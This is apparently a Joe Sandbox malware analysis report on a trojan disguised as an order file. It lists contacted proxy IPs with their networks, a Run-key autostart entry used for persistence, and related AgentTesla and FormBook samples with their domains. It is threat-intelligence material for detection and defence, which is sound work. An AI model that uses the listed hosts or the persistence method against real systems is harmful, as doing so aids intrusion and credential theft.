                                  http://211.234.125.5:443New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://115.240.163.31New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://72.195.34.59:4145://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://160.3.168.70:8080New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://32.223.6.94:80New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://103.234.24.105:8880New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://66.29.129.53:14464://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://145.239.199.109:3128New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://61.216.156.222:60808://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://141.95.160.178:5870New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://104.17.166.210:80New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://116.199.168New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://169.57.157.146:8123New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://223.25.100.42:2222://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://114.99.13.192:8004://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://103.131.8.27:5678New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://104.247.163.246:3825New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://182.253.181.10:8080://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://162.241.6.97:45629://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://104.16.109.143New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://84.241.8.234:8080New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://137.184.200.42:8000://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://185.202.165.1:53281://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://5.135.83.214:80New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://50.168.210.239:80New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.129.250.183New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://50.231.110.26://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://162.214.165.6:42624://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://37.26.223.96:9080://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://35.207.123.94://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.49.31.207:8081://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://209.250.248.127:45534://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://45.138.87.238:1080New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://62.201.220.50:60212New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28504000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://79.7.101.98:5678://proxyNew Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  93.171.243.253
                                  unknownCzech Republic
                                  8870OVDC-ASUAfalse
                                  212.110.188.202
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  24.230.33.96
                                  unknownUnited States
                                  11232MIDCO-NETUSfalse
                                  43.128.107.251
                                  unknownJapan4249LILLY-ASUSfalse
                                  182.160.100.156
                                  unknownBangladesh
                                  24323AAMRA-NETWORKS-AS-APaamranetworkslimitedBDfalse
                                  50.169.37.50
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  103.216.51.36
                                  unknownCambodia
                                  135375TCC-AS-APTodayCommunicationCoLtdKHtrue
                                  193.143.1.201
                                  unknownunknown
                                  57271BITWEB-ASRUtrue
                                  78.90.252.7
                                  unknownBulgaria
                                  20911NETSURF-AS-BGfalse
                                  82.137.245.31
                                  unknownSyrian Arab Republic
                                  29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                  193.124.189.13
                                  unknownRussian Federation
                                  35196IHOR-ASRUfalse
                                  177.67.136.241
                                  unknownBrazil
                                  52663TurboBSBTecnologiasemRedeLtdaBRfalse
                                  51.15.139.15
                                  unknownFrance
                                  12876OnlineSASFRfalse
                                  181.78.11.217
                                  unknownArgentina
                                  52468UFINETPANAMASAPAfalse
                                  194.44.177.225
                                  unknownUkraine
                                  3255UARNET-ASUARNetUAfalse
                                  94.154.152.9
                                  unknownAlbania
                                  209842CYBEXEREEfalse
                                  89.168.121.175
                                  unknownUnited Kingdom
                                  9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                  181.78.11.218
                                  unknownArgentina
                                  52468UFINETPANAMASAPAfalse
                                  139.224.64.191
                                  unknownChina
                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                  94.154.152.4
                                  unknownAlbania
                                  209842CYBEXEREEfalse
                                  41.155.190.214
                                  unknownEgypt
                                  37069MOBINILEGfalse
                                  13.234.24.116
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  180.178.104.110
                                  unknownIndonesia
                                  38758HYPERNET-AS-IDPTHIPERNETINDODATAIDfalse
                                  31.43.63.70
                                  unknownUkraine
                                  50581UTGUAfalse
                                  103.4.118.130
                                  unknownBangladesh
                                  38203ADNTELECOMLTD-BDADNTelecomLtdBDfalse
                                  103.74.229.133
                                  unknownBangladesh
                                  131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                                  52.35.240.119
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  103.25.210.102
                                  unknownIndonesia
                                  132653B-LINK-AS-IDPTTransdataSejahteraIDfalse
                                  101.51.121.29
                                  unknownThailand
                                  23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                  146.19.106.42
                                  unknownFrance
                                  7726FITC-ASUSfalse
                                  51.81.89.146
                                  unknownUnited States
                                  16276OVHFRfalse
                                  46.17.63.166
                                  unknownUnited Kingdom
                                  39326HSO-GROUPGBfalse
                                  114.129.2.82
                                  unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                  62.171.131.101
                                  unknownUnited Kingdom
                                  51167CONTABODEtrue
                                  216.74.255.182
                                  unknownUnited States
                                  11215LOGIXCOMM-ASUSfalse
                                  103.220.205.162
                                  unknownBangladesh
                                  59362KSNETWORK-AS-APKSNetworkLimitedBDfalse
                                  38.127.172.219
                                  unknownUnited States
                                  174COGENT-174USfalse
                                  14.161.17.4
                                  unknownViet Nam
                                  45899VNPT-AS-VNVNPTCorpVNfalse
                                  183.164.254.8
                                  unknownChina
                                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                  103.47.93.252
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  194.9.80.1
                                  unknownunknown
                                  206495IR-SADRA-20180529IRfalse
                                  212.110.188.222
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  148.135.119.4
                                  unknownSweden
                                  158ERI-ASUSfalse
                                  202.162.105.202
                                  unknownSingapore
                                  64050BCPL-SGBGPNETGlobalASNSGfalse
                                  67.205.177.122
                                  unknownUnited States
                                  14061DIGITALOCEAN-ASNUSfalse
                                  212.110.188.220
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  14.232.160.247
                                  unknownViet Nam
                                  45899VNPT-AS-VNVNPTCorpVNfalse
                                  185.215.53.241
                                  unknownArmenia
                                  205368FNETAMfalse
                                  67.213.210.115
                                  unknownUnited States
                                  32780HOSTINGSERVICES-INCUSfalse
                                  67.213.210.118
                                  unknownUnited States
                                  32780HOSTINGSERVICES-INCUStrue
                                  172.67.200.220
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  38.253.88.242
                                  unknownUnited States
                                  174COGENT-174USfalse
                                  13.59.156.167
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  34.176.113.148
                                  unknownUnited States
                                  2686ATGS-MMD-ASUSfalse
                                  212.110.188.216
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  103.47.93.242
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  212.110.188.211
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  103.47.93.236
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  101.95.182.26
                                  unknownChina
                                  4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                  212.110.188.213
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  35.207.123.94
                                  unknownUnited States
                                  19527GOOGLE-2USfalse
                                  183.215.23.242
                                  unknownChina
                                  56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                  103.189.96.98
                                  unknownunknown
                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                  103.153.63.211
                                  unknownunknown
                                  134687TWIDC-AS-APTWIDCLimitedHKfalse
                                  96.80.235.1
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  129.18.164.130
                                  unknownNigeria
                                  36923SWIFTNG-ASNNGfalse
                                  148.72.23.56
                                  unknownUnited States
                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                  188.40.44.95
                                  unknownGermany
                                  24940HETZNER-ASDEfalse
                                  103.99.27.26
                                  unknownunknown
                                  136920GARDAMORLDA-AS-APGardamorLdaTLfalse
                                  188.163.170.130
                                  unknownUkraine
                                  15895KSNET-ASUAfalse
                                  81.250.223.126
                                  unknownFrance
                                  3215FranceTelecom-OrangeFRfalse
                                  218.252.244.126
                                  unknownHong Kong
                                  9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                  191.101.1.116
                                  unknownChile
                                  61317ASDETUKhttpwwwheficedcomGBfalse
                                  94.131.14.66
                                  unknownUkraine
                                  29632NASSIST-ASGIfalse
                                  103.47.93.231
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  212.110.188.207
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBtrue
                                  103.47.93.225
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  118.173.230.19
                                  unknownThailand
                                  23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                  51.15.139.59
                                  unknownFrance
                                  12876OnlineSASFRfalse
                                  104.17.9.114
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  121.129.47.25
                                  unknownKorea Republic of
                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                  45.235.16.121
                                  unknownBrazil
                                  267406AGOBrasilInternetLtdaBRfalse
                                  112.78.161.191
                                  unknownIndonesia
                                  17451BIZNET-AS-APBIZNETNETWORKSIDfalse
                                  200.174.198.95
                                  unknownBrazil
                                  4230CLAROSABRfalse
                                  20.33.5.27
                                  unknownUnited States
                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  45.224.247.102
                                  unknownBrazil
                                  266925UPIXNETWORKSBRfalse
                                  45.190.78.50
                                  unknownunknown
                                  269702CAMPINETINTERNETVIARADIOEIRELIBRfalse
                                  103.47.93.221
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  103.47.93.220
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  185.36.191.240
                                  unknownUkraine
                                  42159DELTAHOST-ASUAfalse
                                  103.216.49.233
                                  unknownCambodia
                                  135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                                  180.104.0.161
                                  unknownChina
                                  137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                                  172.67.181.9
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  14.143.172.238
                                  unknownIndia
                                  4755TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISPfalse
                                  103.47.93.219
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  104.236.0.129
                                  unknownUnited States
                                  14061DIGITALOCEAN-ASNUSfalse
                                  38.127.179.100
                                  unknownUnited States
                                  174COGENT-174USfalse
                                  103.47.93.216
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  185.167.59.215
                                  unknownMoldova Republic of
                                  43783CAGHETPLUS-ASMoldtelecomMDfalse
                                  14.232.235.13
                                  unknownViet Nam
                                  45899VNPT-AS-VNVNPTCorpVNfalse
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1406723
                                  Start date and time:2024-03-11 16:15:25 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 54s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:19
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:New Orders#U034fx#U034fl#U034fx#U034f..exe
                                  renamed because original name is a hash value
                                  Original Sample Name:New Ordersxlx..exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@12/8@6/100
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 93
                                  • Number of non-executed functions: 8
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.202.57.177, 23.72.90.76, 192.229.211.108, 13.85.23.86, 13.95.31.18, 72.21.81.240
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                  • Execution Graph export aborted for target YZbrmyt.exe, PID 42760 because it is empty
                                  • Execution Graph export aborted for target YZbrmyt.exe, PID 42996 because it is empty
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • VT rate limit hit for: New Orders#U034fx#U034fl#U034fx#U034f..exe
                                  TimeTypeDescription
                                  15:16:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YZbrmyt C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                  15:17:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YZbrmyt C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                  16:16:38API Interceptor85x Sleep call for process: New Orders#U034fx#U034fl#U034fx#U034f..exe modified
                                  16:16:55API Interceptor40713x Sleep call for process: InstallUtil.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  93.171.243.253Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                    DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                      https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                        SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                          PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                              FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                212.110.188.202Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                HtfOQz42tN.exeGet hashmaliciousUnknownBrowse
                                                • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                3011574829.exeGet hashmaliciousUnknownBrowse
                                                • artemis-rat.comartemis-rat.com:443
                                                75C8OqdJUQ.exeGet hashmaliciousUnknownBrowse
                                                • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                Urgent Quotation required .exeGet hashmaliciousAgentTeslaBrowse
                                                • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                24.230.33.96Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                  RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                      ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                        OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                          ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                            PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                              Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                  PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    us2.smtp.mailhostbox.comDraft BL Copy & Shipping Documents.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 208.91.198.143
                                                                    SecuriteInfo.com.Win32.PWSX-gen.19078.13674.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    WHW6mWPjVa.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.223
                                                                    EHV24HNVTw.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    mzRBHkLlrA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 208.91.198.143
                                                                    SecuriteInfo.com.Win32.PWSX-gen.19918.11804.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    PDF Order no. 20242902-70611 05.03.2024. - DIV GROUP.PDF.img.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.198.143
                                                                    2024-03 CV Forner Eugenia.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    arbejdsommere.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    • 208.91.199.224
                                                                    new order PO#-QSC240304.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                    • 208.91.198.143
                                                                    ktxcomay.com.vnPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 222.255.238.159
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 222.255.238.159
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 222.255.238.159
                                                                    artemis-rat.comPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.54.158
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.54.158
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.54.158
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.54.158
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.54.158
                                                                    PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.140.87
                                                                    SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.54.158
                                                                    github.comPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.113.4
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.114.3
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.113.3
                                                                    ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                    • 140.82.112.3
                                                                    OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                    • 140.82.114.4
                                                                    rustdesk-1.2.4-x86_64 ITSUR.exeGet hashmaliciousBazaLoaderBrowse
                                                                    • 140.82.114.3
                                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.113.4
                                                                    PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.112.4
                                                                    rustdesk-1.2.4-x86_64 ITSUR.exeGet hashmaliciousBazaLoaderBrowse
                                                                    • 140.82.112.3
                                                                    Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 140.82.112.4
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    BYTEMARK-ASGBPayment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
                                                                    copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 212.110.188.207
